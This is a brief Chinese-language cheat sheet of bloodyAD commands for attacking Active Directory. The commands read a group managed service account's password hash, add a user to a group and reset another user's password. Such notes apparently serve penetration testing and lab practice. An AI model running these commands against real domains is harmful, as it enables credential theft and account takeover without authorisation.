【AD】bloodyAD
1. 常用
1.1. 读取gMSA密码
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword
执行后即可获取到组托管服务账号的hash
1.2. 添加用户到组
#添加用户
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember "$TargetGroup" "$TargetUser"
#查询指定用户的membership,可以用于检测是否添加成功
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get membership "$TargetUser"
1.3. 修改用户密码
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password "$TargetUser" "$NewPassword"
